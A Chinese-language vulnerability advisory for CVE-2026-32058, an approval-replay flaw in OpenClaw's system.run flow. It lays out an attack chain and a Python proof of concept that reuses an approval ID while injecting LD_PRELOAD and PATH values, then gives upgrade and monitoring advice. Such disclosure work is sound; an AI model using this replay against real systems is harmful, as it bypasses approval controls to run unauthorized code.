CVE-2026-32058: OpenClaw审批绕过漏洞

漏洞信息

漏洞编号

CVE-2026-32058

漏洞类型

业务逻辑漏洞/权限绕过

CVSS评分

2.6 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.26之前的版本中存在一个审批上下文绑定缺陷。该漏洞出现在使用host=node的system.run执行流程中。由于未能正确绑定审批上下文，攻击者可以重用之前已批准的请求，并修改其中的环境变量。这使得拥有审批ID的攻击者能够绕过执行完整性控制，在更改环境输入的情况下重放审批请求，从而在已启用审批的工作流中执行未经授权的操作。

技术细节

该漏洞的根源在于OpenClaw在处理system.run执行流程时，特别是当host参数被设置为node时，审批机制未能将审批令牌（Approval ID）与请求的具体参数（尤其是环境变量）进行严格的绑定。在正常的安全设计中，审批操作应当是原子性的，即审批针对的是特定的命令、环境和参数。然而，受影响版本的OpenClaw仅验证了审批ID的有效性，而未在执行阶段重新校验该ID对应的原始环境参数是否被篡改。攻击者首先需要获取一个有效的审批ID（可能通过自己的合法请求生成，或通过其他方式获取）。随后，攻击者利用该漏洞，在重放请求时保留有效的审批ID，但修改env（环境变量）输入。由于系统存在上下文绑定弱点，它接受了修改后的参数并执行了命令，从而绕过了旨在维护执行完整性的审批工作流。

攻击链分析

STEP 1

1. 获取访问权限

攻击者需要拥有OpenClaw的低权限账户访问权限，能够触发system.run流程或获取审批ID。

STEP 2

2. 生成或获取审批ID

攻击者发起一个合法的system.run请求（host=node），生成一个有效的审批ID，或者通过网络嗅探/日志分析获取现有的审批ID。

STEP 3

3. 构造恶意请求

攻击者保留该有效的审批ID，但修改请求中的环境变量（env参数），注入恶意配置或路径。

STEP 4

4. 重放利用请求

攻击者向服务器发送包含修改后环境变量和原始审批ID的请求。

STEP 5

5. 绕过审批执行

由于系统仅校验审批ID有效性而未校验参数一致性，系统接受请求并在修改后的环境中执行命令，导致完整性控制失效。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(target_url, approval_id, malicious_env):
    """
    PoC for CVE-2026-32058
    Exploits the approval context-binding weakness by reusing a valid approval_id
    with modified environment variables.
    """
    headers = {
        "Content-Type": "application/json"
    }

    # The vulnerable endpoint for system.run
    endpoint = f"{target_url}/api/v1/system/run"

    # Construct payload reusing the approval ID but changing environment variables
    payload = {
        "host": "node",
        "approval_id": approval_id,
        "env": malicious_env,
        # Other necessary parameters for the command execution
        "command": "echo 'Execution triggered'"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] Exploit successful: Request executed with modified env.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Example usage
    TARGET = "https://vulnerable-openclaw-instance"
    VALID_APPROVAL_ID = "550e8400-e29b-41d4-a716-446655440000"
    
    # Malicious environment variables to inject
    NEW_ENV = {
        "LD_PRELOAD": "/tmp/malicious.so",
        "PATH": "/tmp:/usr/bin"
    }
    
    exploit_openclaw(TARGET, VALID_APPROVAL_ID, NEW_ENV)

影响范围

OpenClaw < 2026.2.26

防御指南

临时缓解措施

建议立即将OpenClaw升级至2026.2.26或更高版本以修复此漏洞。如果暂时无法升级，应严格限制对审批接口的访问权限，并加强对工作流执行日志的监控，重点检查host=node的system.run操作中环境变量是否与审批时的记录一致。